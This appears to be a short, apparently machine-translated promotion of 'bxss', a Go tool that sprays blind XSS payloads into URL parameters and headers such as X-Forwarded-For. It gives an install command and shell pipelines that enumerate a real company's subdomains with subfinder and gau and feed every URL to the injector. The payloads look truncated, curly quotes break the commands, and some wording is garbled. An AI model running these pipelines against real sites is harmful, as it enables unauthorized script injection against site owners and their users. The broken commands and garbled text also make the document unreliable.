Bxss is a script written in go that helps us discover Blind XSS Injector loopholes security.
Specifications
Insert Blind XSS payloads into custom headers
Enter Blind XSS payloads in parameters
Uses different request methods (PUT, POST, GET, OPTIONS) simultaneously
It has a large chain tools
Really very fast
Easy to install
Installation
$ go get -u github.com/ethicalhackingplayground/bxss
Use
Blind XSS In Parameters
$ subfinder uber.com | gau | grep “&” | bxss -appendMode -payload '”>'-parameters
Blind XSS In X-Forwarded-For Header
$ subfinder uber.com | gau | bxss -payload '”>'-header “X-Forwarded-For”
Snapshots applicationς
You can download the program from here.